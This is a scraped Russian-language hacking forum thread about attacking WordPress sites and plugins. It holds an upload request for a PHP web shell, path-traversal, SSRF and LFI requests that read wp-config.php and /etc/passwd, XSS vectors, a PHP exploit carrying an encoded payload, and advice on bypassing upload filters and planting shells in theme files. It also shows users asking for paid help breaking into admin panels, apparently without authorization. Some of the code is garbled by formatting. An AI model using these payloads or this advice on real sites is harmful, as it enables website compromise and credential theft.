Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at
7:54 PM
Vulnerability Details
=======================
POST
/index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name=
HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101
Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data;
boundary=---------------------------2427186578189
Cookie:
X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22even t%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C %22gallery_title%22%3A%22folder_name%22%2C%22conte xt%22%3A%22attach_to_post%22%7D;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_57cce18206a53fed21932c6dc2920f 94=admin%7C1399203127%7C70f668b775581773d1500b1b81 62de42;
wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
-----------------------------2427186578189
Content-Disposition: form-data; name="name"
cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

The Shell can be accessible at following URL
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #

Подскажите пожалуйста как этим чудом пользоваться?


нужно отправить POST запрос, где при отправке подменить расширение с jpg на php

шелл будет по адресу /wp-content/gallery/folder_name/shell.php

kingbeef
29.04.2015, 19:54
↑ (https://antichat.live/posts/3829425/)
MAC PHOTO GALLERY v. 2.7
MAC PHOTO GALLERY
dork: inurl
lugins/mac-dock-gallery/ download
@version:2.7
Уязвимый код:

$file=dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($fi le));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: '.filesize($file));
ob_clean();
flush();
readfile($file);

POC:
PATCH:
https://wordpress.org/plugins/mac-dock-gallery/other_notes/


Ну и xss там же


http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42

VY_CMa
13.05.2015, 19:28
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429

Affected Versions: 4.2.1 and probably below

Proof of Concept URL for DOM XSS in WordPress:


http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#

Source: http://seclists.org/bugtraq/2015/May/56

BigBear
13.05.2015, 20:08
↑ (https://antichat.live/posts/3846875/)
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions:
4.2.1
and probably below
Proof of Concept URL for DOM XSS in WordPress:

http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#

Source:
http://seclists.org/bugtraq/2015/May/56


Или вот такой вектор для Хрома


[URL="http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#1

SuNDowN
22.05.2015, 20:54
↑ (https://antichat.live/posts/3841833/)
нужно отправить POST запрос, где при отправке подменить расширение с jpg на php
шелл будет по адресу /wp-content/gallery/folder_name/shell.php


А разве для этого не нужны админ права?

winstrool
05.06.2015, 00:38
В паблике была опубликована такая бага:

https://www.exploit-db.com/exploits/37166/ - [SIZE="2"][B]WordPress dzs-zoomsounds Plugins invalid extension - disallowed_filetypeshideFeedbacksCall()'[/COLOR]);
}
if (!is_writable($upload_dir)) {
die('dir not writable - check permissionshideFeedbacksCall()');
}

if (copy($_FILES['file_field']['tmp_name'],$path)) {
echo'file uploadedtop.hideFeedbac ksCall();';
} else {
echo'file could not be uploade dwindow.hideFeedbacksCall()';
}
} else {
$headers=get_theheaders();
if (isset($headers['HTTP_X_FILE_NAME'])) {
//print_r($headers);
$file_name=$headers['HTTP_X_FILE_NAME'];
$file_name=str_replace(" ","_",$file_name);// strip spaces
$target=$upload_dir."/".$file_name;

//==== checking for disallowed file types
$sw=false;

foreach ($disallowed_filetypesas$ dft) {
$pos=strpos($file_name,$dft);
if ($pos!==false) {
$sw=true;
}
}

if ($sw==true) {
die('invalid extension - disallowed_filetypes');
}

if (!is_writable($upload_dir)) {
die('dir not writable - check permissions');
}

//echo $target;
$content=file_get_contents("php://input");

if (file_put_contents($target,$co ntent)) {
echo'success';
} else {
die('error at file_put_c ontents');
}
} else {
die('not for direct access');
}
}[/COLOR]
[/PHP]
максимальная строчка с набором расширений на глаза попалась такая:

$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');

но кто поймет этот участок кода:


foreach ($disallowed_filetypesas$dft) {
$pos=strpos($file_name,$dft);
if ($pos!==false) {
$sw=true;
}
}

поймет что нам это не помеха ;-)

Пассивные XSS:

wp-content/plugins/dzs-videogallery/ajax.php?source="/>alert();

wp-content/plugins/dzs-videogallery/ajax.php?type="/>alert();

http://digitalzoomstudio.net/ - блог автора

http://codecanyon.net/user/ZoomIt/portfolio - портфолио продаж компонентов

P.S: Тэги для гугла)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit

masolit
05.06.2015, 22:34
↑ (https://antichat.live/posts/3855665/)
foreach (
$disallowed_filetypes
as
$dft
) {

$pos
=
strpos
(
$file_name
,
$dft
);

if (
$pos
!==
false
) {

$sw
=
true
;

}

}


А как такое обходиться ?

winstrool
05.06.2015, 22:51
↑ (https://antichat.live/posts/3855944/)
А как такое обходиться ?


смотрите в сторону функций http://php.net/manual/ru/function.strpos.php и http://php.net/manual/ru/function.stripos.php (http://php.net/manual/ru/function.strpos.php)

blackbox
21.06.2015, 17:47
↑ (https://antichat.live/posts/3855950/)
смотрите в сторону функций
http://php.net/manual/ru/function.strpos.php и http://php.net/manual/ru/function.stripos.php (http://php.net/manual/ru/function.strpos.php)


я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?

avin
21.06.2015, 22:49
↑ (https://antichat.live/posts/3861082/)
я тоже не совсем понял, можно просто регистр в расширении другой поставить и тогда такой файл пройдет?


да, пройдет

Sleep
10.07.2015, 10:16
WP 3D Twitter Wall


# Vendor: https://wordpress.org/plugins/3d-twitter-wall/
#/wp-content/plugins/3d-twitter-wall/proxy.php

$url = ($_POST['url']) ? $_POST['url'] : $_GET['url'];
...
$session = curl_init($url); // $url = $_GET['url'] OR $_POST['url']
...
$response = curl_exec($session);
echo $response;
curl_close($session);

POC: _http://example.com/plugins/3d-twitter-wall/proxy.php?url=file:///etc/passwd

grimnir
14.07.2015, 12:48
WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]


# Exploit Title: WordPress CP Image Store with Slideshow 1.0.5 [Arbitrary file download vulnerability]
# Date: 2015-07-10
# Google Dork:
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://wordpress.dwbooster.com/
# Software Link: https://downloads.wordpress.org/plugin/cp-image-store.1.0.5.zip
# Version: 1.0.5
# Tested on: windows 7 + firefox.

====================
DESCRIPTION
====================

A vulnerability has been detected in the WordPress CP Image Store with Slideshow plugin in version 1.0.5 .
The vulnerability allows remote attackers to download arbitrary files from the server.
The Arbitrary file download vulnerability is located in the `cp-image-store.php` file.

The web vulnerability can be exploited by remote attackers without privileged application user account
and without required user interaction. Successful exploitation of the Arbitrary file download vulnerability results
in application compromise.

==============
POC
==============

# http://wp-host/wp-path/?action=cpis_init&cpis-action=f-download&purchase_id=1&cpis_user_email=i0SECLAB@intermal.com&f=../../../../wp-config.php HTTP/1.1

the purchase_id parameter can be bruteforced and succesfully exploit this vulnerability.


==================
VULNERABLE CODE
==================

Located in cp-image-store.php

function cpis_download_file(){
...

if( isset( $_REQUEST[ 'f' ] ) && cpis_check_download_permissions() ){
header( 'Content-Type: '.cpis_mime_content_type( basename( $_REQUEST[ 'f' ] ) ) );
header( 'Content-Disposition: attachment; filename="'.$_REQUEST[ 'f' ].'"' );
if( cpis_checkMemory( array( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] ) ) ){
readfile( CPIS_DOWNLOAD.'/'.$_REQUEST[ 'f' ] );
}else{
@unlink( CPIS_DOWNLOAD.'/.htaccess');
header( 'location:'.CPIS_PLUGIN_URL.'/downloads/'.$_REQUEST[ 'f' ] );
}
...
}

PoizOn
03.08.2015, 12:17
Вот интересная бага:

http://seclists.org/fulldisclosure/2015/Feb/75

Но я до чего-то вразумительтного ее не докрутил

admin.php?page=wc-reports&";>

admin.php?page=wc-reports&";>WOW

grimnir
07.12.2015, 06:30
https://github.com/claudioviviani/wordbrutepress


Многопоточный брут ВП стандартным перебором и используя xml-rpc




1) Multithreading
2) xml-rpc brute force mode
3) http and https protocols support
4) Random User Agent
5) Big wordlist support

(https://github.com/claudioviviani/wordbrutepress)

Sleep
04.02.2016, 17:44
Contact form 7


Full Path Disclosure

wp-content/plugins/contact-form-7/includes/upgrade.php

/wp-content/plugins/contact-form-7/modules/acceptance.php

/wp-content/plugins/contact-form-7/modules/akismet.php

/wp-content/plugins/contact-form-7/modules/checkbox.php

/wp-content/plugins/contact-form-7/modules/count.php

/wp-content/plugins/contact-form-7/modules/date.php

/wp-content/plugins/contact-form-7/modules/file.php

/wp-content/plugins/contact-form-7/modules/flamingo.php

/wp-content/plugins/contact-form-7/modules/jetpack.php

/wp-content/plugins/contact-form-7/modules/listo.php

/wp-content/plugins/contact-form-7/modules/number.php

/wp-content/plugins/contact-form-7/modules/quiz.php

/wp-content/plugins/contact-form-7/modules/really-simple-captcha.php

/wp-content/plugins/contact-form-7/modules/recaptcha.php

/wp-content/plugins/contact-form-7/modules/response.php

/wp-content/plugins/contact-form-7/modules/select.php

/wp-content/plugins/contact-form-7/modules/submit.php

/wp-content/plugins/contact-form-7/modules/text.php

/wp-content/plugins/contact-form-7/modules/textarea.php

grimnir
08.03.2016, 13:31
https://github.com/rastating/wordpress-exploit-framework

Ruby фреймворк для эскплутации и тестирования WP

статья на английском

http://www.kitploit.com/2016/03/wordpress-exploit-framework-ruby.html

R3hab
20.04.2016, 14:17
какие методы есть заливки шелла в wp?

powerOfthemind
20.04.2016, 15:52
↑ (https://antichat.live/posts/3975762/)
какие методы есть заливки шелла в wp?


Смотря какие у тебя права в админк, если можешь редактировать шаблон то в страницу 404 пихаешь код шела и радуешься или через загрузку плагина, пакуешь в архив шел и льеш на сайт.

.Light.
03.05.2016, 14:38
WordPress Plugin Quick Page/Post Redirect Open Redirect Current plugin version: 5.1.3.

WordPress Plugin WooCommerce-excelling eCommerce Cross-Site Scripting Current plugin version: 2.3.13.

Есть чтонить под эти плагины?

R3hab
23.08.2016, 12:56
есть что нибудь на WordPress 4.4.4 ?

sander
23.08.2016, 14:11
↑ (https://antichat.live/posts/3984105/)
есть что нибудь на WordPress 4.4.4 ?


Я нашёл токо это,но XSS ^.^

сайт.ру/wp-admin/customize.php?theme=

headWoW
25.08.2016, 13:52
Как можно взломать WP сайт посоветуйте способы

sander
29.08.2016, 08:41
↑ (https://antichat.live/posts/3984665/)
Как можно взломать WP сайт посоветуйте способы


Версию WP.

powerOfthemind
30.08.2016, 12:09
↑ (https://antichat.live/posts/3984665/)
Как можно взломать WP сайт посоветуйте способы


Cmsmap просканируй ,посмотри какие плагины стоят, потом ищи под них сплоит или ищи сам дыры в плагинах

.Light.
19.09.2016, 23:27
как узнать полный путь версия 4.6

nikrus
23.09.2016, 20:40
Доброго времени суток. Есть необходимость получить доступ к админке wordpress 4.5.2. Возможно ли такое?

Sensoft
23.09.2016, 22:54
↑ (https://antichat.live/posts/3994483/)
Доброго времени суток. Есть необходимость получить доступ к админке wordpress 4.5.2. Возможно ли такое?


Попробуй эксплоит найти но я посмотрел не нашёл, и проскань впсканом

nikrus
24.09.2016, 02:33
↑ (https://antichat.live/posts/3994539/)
Попробуй эксплоит нйти но я посмотрел не нашёл, и проскань впсканом


Впскан не кажет уязвимостей... Вопрос актуален, естественно все труды будут оплачены.

Sensoft
24.09.2016, 02:37
↑ (https://antichat.live/posts/3994649/)
Впскан не кажет уязвимостей... Вопрос актуален, естественно все труды будут оплачены.


кинь ссылку в лс

nikrus
27.09.2016, 16:11
Вопрос по админке актуален

jakonda1001
28.09.2016, 12:50
скинь в личку

nikrus
29.09.2016, 22:05
Народ, неужели это нереально?

Logos21
04.10.2016, 23:06
Всем привет, никто не находил уязвимости в вп 4.4.5?

winstrool
10.10.2016, 22:12
0day exploit for WordPress plugins «Simple Ads Manager, SAM Pro Lite, SAM Pro (Free Edition)» (http://portfob.ru/security-time/0day-exploit-for-wordpress-plugins-simple-ads-manager-sam-pro-lite-sam-pro-free-edition/)

abrakadabra
31.12.2016, 11:23
WordPress Version 4.6.1

google-capcha

contact form 7

что можно сделать подскажите .

SnoopDog007
02.01.2017, 13:46
Есть сайт на нем проверенная CVE-2015-4566, как можно увести куки?

Wordpress 4.3.1

crlf
02.01.2017, 23:32
↑ (https://antichat.live/posts/4000504/)
0day exploit for WordPress plugins «Simple Ads Manager, SAM Pro Lite, SAM Pro (Free Edition)» (http://portfob.ru/security-time/0day-exploit-for-wordpress-plugins-simple-ads-manager-sam-pro-lite-sam-pro-free-edition/)


Судя по приведённому коду в блоге, при LFI, нуллбайт не обязателен и эксп может использоваться на свежих пыхах:



wap=base64_encode('/../wp-action.php/../../../../../../../../../../../etc/passwd');

pav1uxa
03.01.2017, 11:50
[B]Wordpress 'Foo', 'TextDomain'=>'Bar');
private \$theme_root = '$ftp';
private \$stylesheet = '$dir';
}
");

$default='a:2:{i:2;a:1:{s:5:"title";s:0:"";}s:12:"_multiwidget";i:1;}';
$arr=unserialize($default);
$arr[2]['title'] = newWP_Theme;

echo"\nPayload: \nUPDATE wp_options SET option_valu e = 0x".ascii2hex(serialize($arr))." WHERE wp_options.option_id = ".$option_id."\n";

echo"\nRestore: \nUPDATE wp_options SET option_valu e = 0x".ascii2hex($default)." WHERE wp_options.option_id = ".$option_id."\n";

echo"\nCheck it:\n\n$ftp/path/to/anonymous/directory/$dir/languages/$file\n\n";

if(!file_exists($file))file_put_contents($file,gzd ecode(base64_decode('H4sIAAAAAAAAA3VRz08UMRQu4mnkx MGThx40COQxO4uaTTd7EBiQZCcuu7NqYgwpM8/Zkm47aTsESLj5L/jv+V94982OChde8vV9bb/k/fh+bT79ySjWCS8Ib1gX4wf5OSEjPCOUhB9rjNV/338TjyhvPKHjveF4LZe1RvbK/6OefUCtLf9snS7ZxNlLLAKclvAJnVfWCD62heVHuLTRFGvrAmS +UiUcNJWH3AoeTT7mcOhQBpLDkQwoeL+XvIMkgX6fJ2/F/v5uj4KEMMUr5R/VDTrdWPoAuZPGaxmsoxJjaapGVgg5yqXgs1oa5Rf/nwVHD+ksmujGSQ3H1i294KZeXf2oP+QdHSXbwzu8kvr1y/NpejZPZ/nXLVfg1rftYbwTZadZej93steLDq0JaKiZm5qKBLwOca2lMkNe LKTzGEbz/BgG97q26e/oIDWFLZWpBB9cqBB9gXaLMLMNVWu51G3T5nw6p78TNOi6SVfLB r4IofYijnWrVB73LtRtzOZk4CWSa3ZlYEfJQKslzxpTWhb9AQt sWO0xAgAA')));

functionascii2hex($p){$r='';for($i=0;$i[/COLOR]
[/PHP]

abrakadabra
05.01.2017, 11:08
↑ (https://antichat.live/posts/3924314/)
https://github.com/claudioviviani/wordbrutepress



Там ошибки вылетают, с функцией print ни на версии 27 и 35 питоне не запускаеться.

kacergei
18.01.2017, 14:21
WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)

Пароли на расшифровке на неизвестное время

Можно ли как то задействовать функцию восстановления пароля?

Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать

Ravenous
18.01.2017, 23:52
↑ (https://antichat.live/posts/4037448/)
WordPress 4.6.2 через соседние самописные скрипты имею sql-injection (только просмотр БД)
Пароли на расшифровке на неизвестное время
Можно ли как то задействовать функцию восстановления пароля?
Как привести в нормальный вид хеш содержащиеся в wp_users -> user_activation_key Вида (1484638848:$P$BT9pkNHDgo7gLHb1VaK1MoqYppOuC0) (пару символов неверны), что бы в URL'e указать


никак. user-activation-key зашифрован так же, как пароль. Он хранился в чистом виде только в древних версиях

amik
27.01.2017, 23:03
кто нибудь слышал об sql injection от версии 4.7 и ниже.

как я понял уязвимость находиться wp_query

crlf
28.01.2017, 00:08
↑ (https://antichat.live/posts/4041348/)
кто нибудь слышал об sql injection от версии 4.7 и ниже.
как я понял уязвимость находиться wp_query


Баг из разряда гипотетических:

WP_Query is vulnerable to a SQL injection (SQLi) when passing unsafe data. WordPress core is not directly vulnerable to this issue, but we’ve added hardening to prevent plugins and themes from accidentally causing a vulnerability.

https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb (http://%20https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb)

st55
08.02.2017, 12:09
Wordpress 4.*.*

Full Path Disclosure

wordpress/wp-login.php


POST: log[]=1&pwd[]=1&redirect_to[]=

wp-json


GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123



Cookie: comment_author_email_dbdee7661db32144cd2347d98b860 504[]


Wordpress 4.7.2

Stored XSS

Привилегии: Редактор+

/wp/wp-comments-post.php


POST: comment=">alert('XSS');

http://rgho.st/7kvhw9tvL/image.png

mazaxaka
12.03.2017, 00:12
↑ (https://antichat.live/posts/4046514/)
Wordpress 4.*.*

Full Path Disclosure
wordpress/wp-login.php

POST: log[]=1&pwd[]=1&redirect_to[]=

wp-json

GET: wordpress/wp-json/oembed/1.0/embed?format=xml&url[]=123


Cookie: comment_author_email_dbdee7661db32144cd2347d98b860 504[]

Wordpress 4.7.2

Stored XSS
Привилегии: Редактор+
/wp/wp-comments-post.php

POST: comment=">alert('XSS');

http://rgho.st/7kvhw9tvL/image.png


раскрытие путей работает только через wp-login.php и то редко, wp-json вообще не работает, можно подробней?

loverast
12.03.2017, 19:05
Кто нибудь заюзал эту багу https://xakep.ru/2017/03/01/nextgen-gallery-sql-injection/ ?

ACat
21.03.2017, 12:19
Народ, нужна ваша помощь:

1 у кого-то когда-то срабатывали эксплоиты на ВП из метасплоита???

2 - https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb

как применить его на практике?

ArturKonDoil
29.03.2017, 21:52
Всем доброго времени суток. Нужна помощь в получении доступа к админке WordPress 4.7.3, естественно не бесплатно. Можно в личку.

karkajoi
31.03.2017, 15:24
↑ (https://antichat.live/posts/4063298/)
Народ, нужна ваша помощь:
1 у кого-то когда-то срабатывали эксплоиты на ВП из метасплоита???
2 -
https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
как применить его на практике?


Работали. Юзал эксполит на добовление админа через SQL inj в каком-то плагине.По 2му вопросу я хз.

dzen777
31.03.2017, 18:39
Посоветуйте хороший чекер на уязвимости для WP ?

cat1vo
31.03.2017, 22:45
↑ (https://antichat.live/posts/4067176/)
Посоветуйте хороший чекер на уязвимости для WP ?


https://github.com/wpscanteam/wpscan (c) Google Search

kolbear
04.04.2017, 14:35
Здравствуйте форумчане

помогите с доступом к пользователям, сайт на WP

Детальнее в личке.

VY_CMa
11.08.2017, 20:13
В связи с переходом многих хостинг компаний на PHP7 и другие версии, в которых отсутствуют некоторые функции, стали появляться интересные сообщения об ошибках, включающие чувствительную информацию. Следующий пример демонстрирует раскрытие данных для подключения к базе данных.

.SpoilerTarget" type="button">Spoiler: Click


depts.washington.edu/leaders1/elizabeth-smith/feed/


Dork:


intext:Stack trace #0 wpdb->__construct(

VY_CMa
14.11.2017, 12:38
[B][SIZE="1"]Wordpress

jakonda1001
12.01.2018, 11:03
нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?

jakonda1001
16.01.2018, 03:13
не

XuliNam
12.03.2018, 23:08
Привет народ подскажите литературу о поиске и использовании уязвимости WP

Exxtazy
13.03.2018, 00:53
Подскажите, пожалуйста, какие есть рабочие уязвимости на wordpress 3.9.1 ?

newaddidas
20.03.2019, 22:35
Версия 4.2.2 Посоветуйте

Rastamanka
22.10.2019, 14:35
↑ (https://antichat.live/posts/4172133/)
нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?


Что за способ если не секрет?

Goore
23.11.2019, 01:54
Privet, kto znaet kak izpolzuvats etot? https://wpvulndb.com/vulnerabilities/9955

karkajoi
23.11.2019, 05:00
при наличии админки, шел льется в 404 ошибку, вернее в этот файл